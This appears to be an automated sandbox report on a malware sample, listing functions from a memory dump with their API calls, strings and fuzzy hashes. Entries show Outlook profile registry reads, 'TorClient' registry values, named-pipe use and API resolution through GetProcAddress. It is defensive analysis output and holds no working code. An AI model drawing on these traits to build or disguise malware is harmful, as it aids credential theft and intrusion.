Opcode ID: 2064d9c846cee3c5c37c5b279512e524b8a65a5237d2026c792608ec618c38ef
Instruction ID: b8ae8e354a1e94b5b8c6d28a29d4938fe4116cb112093adeabeb0d8442c4279f
Opcode Fuzzy Hash: 2064d9c846cee3c5c37c5b279512e524b8a65a5237d2026c792608ec618c38ef
Instruction Fuzzy Hash: 96F0C231280205BBDB115F70DC0AFAA3E26FF05790F144921FB2AE65D0E7719070CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02B87854, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,02B7F7B7,004F0053,00000000), ref: 02B87860
memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,02B7F7B7,004F0053,00000000), ref: 02B87888
memset.NTDLL ref: 02B8789A

Strings

System, xrefs: 02B8785A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpymemset
String ID: System
API String ID: 4042389641-3470857405
Opcode ID: c9cf89cec023dd1a9a6a6b88a71aee20d5f11d49a511bdb29725f253ef874da9
Instruction ID: 2d4c3d9f3e4dbd75e4728c4f21667ad14c4d8087a55c8aa084208fb80c60e140
Opcode Fuzzy Hash: c9cf89cec023dd1a9a6a6b88a71aee20d5f11d49a511bdb29725f253ef874da9
Instruction Fuzzy Hash: B3F0E0B7D00214B7D7207EA99C89DAF7AEDDBD53947150475F91993300EA70DD00D760

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CEB4, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,02B793AD,000000FF,05AE8900,?,?,02B7815D,0000012B,05AE8900), ref: 02B8CED0
GetLastError.KERNEL32(?,?,02B7815D,0000012B,05AE8900,?,?,02B879A9,00000000,?), ref: 02B8CEDB
WaitNamedPipeA.KERNEL32(00002710), ref: 02B8CEFD
WaitForSingleObject.KERNEL32(00000000,?,?,02B7815D,0000012B,05AE8900,?,?,02B879A9,00000000,?), ref: 02B8CF0B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 3f0e7748dee5c33937efab79189a6f61030035dbc0e30266b58cff5a04cbc285
Instruction ID: db62a1e241bdacac17c414e603fa58089145fc78e97b0f57ab0b7e826d65ab75
Opcode Fuzzy Hash: 3f0e7748dee5c33937efab79189a6f61030035dbc0e30266b58cff5a04cbc285
Instruction Fuzzy Hash: 93F09672E84220ABE7356A74ED8DB567E25EB053F5F114A63F90DE71D0C3318C64C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7675E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

memcpy.NTDLL(02B9D06C,?,00000028,00000000,Client,?,?,?,?,?,02B958E7,?,?,?,?,02B720D2), ref: 02B76790
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,02B958E7,?,?,?,?,02B720D2,?), ref: 02B767C1

Strings

(, xrefs: 02B76779
Client, xrefs: 02B7676B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: 4962c86b96065a25e623fe475453290e2bd36ec972fc9c05c1521d8cf93a65fa
Instruction ID: 5f363611c670a25708aa1e309a266116ec3fb737523490ba28ed580b0ddef1b9
Opcode Fuzzy Hash: 4962c86b96065a25e623fe475453290e2bd36ec972fc9c05c1521d8cf93a65fa
Instruction Fuzzy Hash: 0FF06976D80205FBEB20AF82DE06B997B6CEB04790F400596EA05A3190DAB15924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B884CA, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B884D3
Sleep.KERNEL32(0000000A,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B884DD
HeapFree.KERNEL32(00000000,?,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B88505
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B88523

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 3850ca41df09850db410004996ea8e59d08a96c797f5c31f77bb161fe5155f28
Instruction ID: 6dc831a5b0e299f42a5b451e71decf9c3baf95cdbc291b77a9f1150602e33051
Opcode Fuzzy Hash: 3850ca41df09850db410004996ea8e59d08a96c797f5c31f77bb161fe5155f28
Instruction Fuzzy Hash: D0F08271A802419FE720EF29DE89F573BA5EB01380F088D49F50AC7292C330D960CF26

Uniqueness

Uniqueness Score: -1.00%

Function 02B79A6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,02B81EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 02B79A8C
wsprintfA.USER32 ref: 02B79AAA

Strings

%02u:%02u:%02u , xrefs: 02B79AA4

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: 6c14858cb27ae83e3eccedd275bb7bfa3724b209ed0b6bae95df6d0379669e0d
Instruction ID: 12da386ab5b5595807500b6f526c895781a26f9843f0a6a9a5e49dcdfcdfce13
Opcode Fuzzy Hash: 6c14858cb27ae83e3eccedd275bb7bfa3724b209ed0b6bae95df6d0379669e0d
Instruction Fuzzy Hash: 262117B5E40204AFDB11EB95D84AEAB77BDFB8D741B0048AAF911DB241D774E821CB70

Uniqueness

Uniqueness Score: -1.00%

Function 02B880EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 02B88132
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 02B88144

Strings

0x, xrefs: 02B8812C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: dc80d00eb298b67fa738a276da151298353ffd7512cda5c46843434070d2c2a6
Instruction ID: 942f2bd043dee620f7e57ffae9f8ce1d36809cc03973def4244e5e1e24b9af17
Opcode Fuzzy Hash: dc80d00eb298b67fa738a276da151298353ffd7512cda5c46843434070d2c2a6
Instruction Fuzzy Hash: D3018475900209BBDB01EFA9D945AEFBBB9EF48344F404865E908E7200EB70DA09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B80DCC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32( F.w,00000000,00000000,00000000,772E4620,00000000,02B75FE6,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B80DDD

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,02B723FE), ref: 02B80DFA

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Strings

F.w, xrefs: 02B80DD9

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: F.w
API String ID: 1564683301-805792995
Opcode ID: 312ece349ff89269328c4b3b1d82afd5a2818d717649c879fddca066e002173e
Instruction ID: f914de14eb6890b7cad54e60c4047f87da4e6725270287b5bcb46d4882ca0b7e
Opcode Fuzzy Hash: 312ece349ff89269328c4b3b1d82afd5a2818d717649c879fddca066e002173e
Instruction Fuzzy Hash: E0E01233D0153366463175AA9D44C4BDEDDEF966E63150575F94CD3120E720D815C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 02B8713E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7810A: RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
Part of subcall function 02B7810A: lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

RegSetValueExA.ADVAPI32(02B94AB1,Client,00000000,00000003,00000000,00000028,00000001,02B94AB1,05AE8D5C,00000057,?,?,02B871B4,02B9D06C,02B9D072,02B8CE23), ref: 02B8716B
RegCloseKey.ADVAPI32(02B94AB1,?,?,02B871B4,02B9D06C,02B9D072,02B8CE23,00000000,00000000,00000000,?,?,02B7F22B,05AE8D5C,73FCC740,00000000), ref: 02B87176

Strings

Client, xrefs: 02B87163

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: a161d4ebc4d23d95f37242fc0cb72c9bc9c2daacc075f08532a283a9079a394d
Instruction ID: 28787d5625d3453afb812cd5e1e3530b86fa6eb26d7a1360b8d07de79f70489e
Opcode Fuzzy Hash: a161d4ebc4d23d95f37242fc0cb72c9bc9c2daacc075f08532a283a9079a394d
Instruction Fuzzy Hash: 1CE09236A80115FBDB126A95DD0AE9EBBADDB097A0F004061FB04E7190D6B09E1097E0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A4DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26filememoryCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,00000000,?,00000006,?), ref: 02B8A500
HeapFree.KERNEL32(00000000,?), ref: 02B8A511

Strings

SUVWh4#, xrefs: 02B8A4E5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: DeleteFileFreeHeap
String ID: SUVWh4#
API String ID: 3605628762-1829937277
Opcode ID: 6b9fa8ae60eaf58ca29d156a3dca0a084b54857f4751e7acf352d80b8a9d6d99
Instruction ID: 0c97a4c753f3bafe3d5ce3367883f48b08bf9706a065eabc97f75517956c1230
Opcode Fuzzy Hash: 6b9fa8ae60eaf58ca29d156a3dca0a084b54857f4751e7acf352d80b8a9d6d99
Instruction Fuzzy Hash: 31E0ED76D40218BBCB1167E59D0AF9E7BADDB05790F100991FA01A3150D6759E209AA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B748E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\,00000000,00020019,?), ref: 02B748FD
RegCloseKey.ADVAPI32(?,?,?), ref: 02B74919

Strings

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\, xrefs: 02B748F3

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
API String ID: 47109696-3083934730
Opcode ID: 5b245d01e1bbbaf65f772f2425c40db362ddedc538ced94054dbe8a08dcf7314
Instruction ID: 11afc5082e0192a5f3be56cb24a9222bdf67d340ac6e3d47a6d261f7710c7071
Opcode Fuzzy Hash: 5b245d01e1bbbaf65f772f2425c40db362ddedc538ced94054dbe8a08dcf7314
Instruction Fuzzy Hash: 8DE04F76A40228BBDB116A91DD0AF8DB769DB05790F1005A1FF01B3251D6719E20AAD4

Uniqueness

Uniqueness Score: -1.00%

Function 02B861AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\,00000000,00020019,?,00000008,?,?,02B76FF8,?,?,?,?), ref: 02B861C4
RegCloseKey.ADVAPI32(?,?,00000001,?,?,02B76FF8,?,?,?,?), ref: 02B861E0

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\, xrefs: 02B861BA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
API String ID: 47109696-1895784063
Opcode ID: fb0f794de55ce23c034ee9e12b971fbd5d213815dd6b7ce2c4fd919bfb7f2dbc
Instruction ID: 0ba7cb8161a1ce1b218b15d18c4f220246b7fb8bfdb39ae6c93f173cdca875e0
Opcode Fuzzy Hash: fb0f794de55ce23c034ee9e12b971fbd5d213815dd6b7ce2c4fd919bfb7f2dbc
Instruction Fuzzy Hash: 89E04F76E80228FBDB216A91DD06F9DBB69DB04790F1041A1FE01B3251D671DE20D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B945, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\,00000000,00020019,?,00000008,?,?,02B77000,?,?,?,?,?), ref: 02B8B95F
RegCloseKey.ADVAPI32(?,?,00000001,?,?,02B77000,?,?,?,?,?), ref: 02B8B97B

Strings

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\, xrefs: 02B8B955

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
API String ID: 47109696-316241766
Opcode ID: de1087193b2c02c9a65b5d8a566762744158596cb0c3363dca925b140efccd43
Instruction ID: 24ea629460c7120b9a7d0430d5f3f5ceefc749c3083d40efe9ca3e8a5e53ef50
Opcode Fuzzy Hash: de1087193b2c02c9a65b5d8a566762744158596cb0c3363dca925b140efccd43
Instruction Fuzzy Hash: 22E08676E80228FBDF116BA1DD45F8DB769DB08790F100191FE05F3250D6719E20DAD0

Uniqueness

Uniqueness Score: -1.00%

Function 02B87579, Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

APIs

memcpy.NTDLL(-00000040,02B8684B,00000800,00000000,00000000,?,00000B54), ref: 02B877BB

Part of subcall function 02B845CA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,02B71440,?,?,?,?,02B87689,?,?,00000000,?,00000B54), ref: 02B845EF
Part of subcall function 02B845CA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B84611
Part of subcall function 02B845CA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B84627
Part of subcall function 02B845CA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B8463D
Part of subcall function 02B845CA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B84653
Part of subcall function 02B845CA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B84669

Part of subcall function 02B776AC: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000B54), ref: 02B77712
Part of subcall function 02B776AC: memcpy.NTDLL(?,?,?), ref: 02B77771

memcpy.NTDLL(?,?,?,?,02B71440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 02B876E8
memcpy.NTDLL(00000018,?,00000018,?,02B71440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 02B87734
memset.NTDLL ref: 02B8783B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressProcmemcpy$HandleModulememset
String ID:
API String ID: 2847270571-0
Opcode ID: f8731c758a5411638958afebcdcab97c22d0972416154893ee05044b067699e5
Instruction ID: fd2661e99c6cf614bf29d495e275b096e8302e5f0e96b5870785ee340a24bf76
Opcode Fuzzy Hash: f8731c758a5411638958afebcdcab97c22d0972416154893ee05044b067699e5
Instruction Fuzzy Hash: F4913E7990020AEFCF10EF95C984BAEFBB5FF04308F2445A9D919A7250DB70AA54DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B90BC5, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B90C23
CloseHandle.KERNEL32(?,?,00000010,?,00000000,00000000,02B745A1,00000000), ref: 02B90C6E
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,02B8A4DB,00000000,02B745A1,02B723B1,00000000,02B745A1,02B92B6B,00000000,02B745A1,02B923B3,00000000), ref: 02B90F6A
GetLastError.KERNEL32(?,00000000,?), ref: 02B9118C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 92b7eb5c18d3fe064439fdfa49c7c0803d55ad2e378710d09a29b0347e5e339c
Instruction ID: 9ab7ca3b3268ae875634c7fac4af2a2b665df2cbf81278c0794a9ec3bfb5e058
Opcode Fuzzy Hash: 92b7eb5c18d3fe064439fdfa49c7c0803d55ad2e378710d09a29b0347e5e339c
Instruction Fuzzy Hash: 7541C53561422ABBEF217F68CC41FBF366AEB46740F0445F2F95DA1090DB718991EE22

Uniqueness

Uniqueness Score: -1.00%

Function 02B8E3A4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B8E3CA
memcpy.NTDLL ref: 02B8E3F2

Part of subcall function 02B79DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 02B79DE4
Part of subcall function 02B79DAC: SetLastError.KERNEL32(00000000), ref: 02B79DEB

GetLastError.KERNEL32(00000010,00000218,02B96DDD,00000100,?,00000318,00000008), ref: 02B8E409
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,02B96DDD,00000100), ref: 02B8E4EC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: 23ba146f6e7de101720f8954fd5d4ee9a37b6ce6be55b8d6c13adc81a7e8348e
Instruction ID: be2b3ceb41128322a5b4ec478176591f0e701553aee135fd630966b942d31833
Opcode Fuzzy Hash: 23ba146f6e7de101720f8954fd5d4ee9a37b6ce6be55b8d6c13adc81a7e8348e
Instruction Fuzzy Hash: C1415EB1544301AFDB60EF29D841BAAB7E9EB48750F04496DF59DC6290E730D514CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B71684, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8118D: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?), ref: 02B811B1
Part of subcall function 02B8118D: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B811C3
Part of subcall function 02B8118D: wcstombs.NTDLL ref: 02B811D1
Part of subcall function 02B8118D: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?), ref: 02B811F5
Part of subcall function 02B8118D: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 02B8120A
Part of subcall function 02B8118D: mbstowcs.NTDLL ref: 02B81217
Part of subcall function 02B8118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?,?), ref: 02B81229
Part of subcall function 02B8118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?,?), ref: 02B81243

GetLastError.KERNEL32 ref: 02B71723

Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B7199D
Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719BD
Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719C9

HeapFree.KERNEL32(00000000,?), ref: 02B7173F
HeapFree.KERNEL32(00000000,?), ref: 02B71750
SetLastError.KERNEL32(00000000), ref: 02B71753

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: ff6d2f876dd6440c0da17a684f32a94afd42f4285058811a313c9edfeb42f55a
Instruction ID: f0f4b590027e87a779311532f9fff3af54a06b3b50e08272719f51b747f87295
Opcode Fuzzy Hash: ff6d2f876dd6440c0da17a684f32a94afd42f4285058811a313c9edfeb42f55a
Instruction Fuzzy Hash: 52312A76900108FFCF12AF99DD4589EBFB9FF49360B144596F929A3160C3318A61DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B84FC5, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7C550: lstrlen.KERNEL32(00000000,?,?,00000000,772E4620,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C5A9
Part of subcall function 02B7C550: lstrlen.KERNEL32(?,?,?,00000000,772E4620,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C5C7
Part of subcall function 02B7C550: RtlAllocateHeap.NTDLL(00000000,76D26985,?), ref: 02B7C5F0
Part of subcall function 02B7C550: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C607
Part of subcall function 02B7C550: HeapFree.KERNEL32(00000000,00000000), ref: 02B7C61A
Part of subcall function 02B7C550: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C629

GetLastError.KERNEL32 ref: 02B85064

Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B7199D
Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719BD
Part of subcall function 02B718E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719C9

HeapFree.KERNEL32(00000000,?), ref: 02B85080
HeapFree.KERNEL32(00000000,?), ref: 02B85091
SetLastError.KERNEL32(00000000), ref: 02B85094

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: e68b6ac71d76b9ec8f47505a6b112a26d112d9288e034650db9c185268c95a65
Instruction ID: 24cb90f28c13f775bf0a78b3d59b770cf1fff138cd300e707d4b3b0bcf5f8503
Opcode Fuzzy Hash: e68b6ac71d76b9ec8f47505a6b112a26d112d9288e034650db9c185268c95a65
Instruction Fuzzy Hash: A4314932800108FFCF22AFA9DD419DEBFB5FF49350B414596F929A2120C3328A60DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8F57B, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B8F5C6
memset.NTDLL ref: 02B8F5DD
memset.NTDLL ref: 02B8F5F4
memset.NTDLL ref: 02B8F60C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: aa59cbc92b76ff8a35e77f049f3adaa98901eb9f361bd7d5e61ff30d8269c41d
Instruction ID: 3ff6b855d07bee25cf7400ea22b15939b508e86bc6d2f3f16c41137945418515
Opcode Fuzzy Hash: aa59cbc92b76ff8a35e77f049f3adaa98901eb9f361bd7d5e61ff30d8269c41d
Instruction Fuzzy Hash: 9C21A172600509BBCB206F50EC809767B7AFF19304BC50299E94986D61D732F4B5CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B77D07, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,02B81117), ref: 02B77D13

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Part of subcall function 02B964DE: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,02B77D41,00000000,00000001,00000001,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60), ref: 02B964EC
Part of subcall function 02B964DE: StrChrA.SHLWAPI(00000000,0000003F,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,02B81117,00000008,?), ref: 02B964F6

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 02B77D71
lstrcpy.KERNEL32(00000000,00000000), ref: 02B77D81
lstrcpy.KERNEL32(00000000,00000000), ref: 02B77D8D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: b4a280d59cfe1b34607e4b9c0deaa32eb94a3f6c8fc2a9b22a3d7e7960d95c35
Instruction ID: f4f5fbe4af8ffdf4cbc8e53c8c559660ac495b4491b96be174023ad2637151c4
Opcode Fuzzy Hash: b4a280d59cfe1b34607e4b9c0deaa32eb94a3f6c8fc2a9b22a3d7e7960d95c35
Instruction Fuzzy Hash: 5B21B4B2904215FFCB12AF64DC44EAABFA9EF06384F0940E5F9199B251DB30D910DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02B78E40, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B78E74
memset.NTDLL ref: 02B78E8B
memset.NTDLL ref: 02B78EA2
memset.NTDLL ref: 02B78EBA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction ID: 5cb0b5eb226c3567ae74e91f2980af31eaf8607927711424dc476bdaa852c1c4
Opcode Fuzzy Hash: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction Fuzzy Hash: 0611A3B250050DBBCB206F90EC44A67776AFF09308B450198F54855811D772F5B5EFE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A587, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,76D681D0,02B94BD7,612E002F,00000000), ref: 02B8A593
lstrlen.KERNEL32(?), ref: 02B8A59B

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

lstrcpy.KERNEL32(00000000,?), ref: 02B8A5B2
lstrcat.KERNEL32(00000000,?), ref: 02B8A5BD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

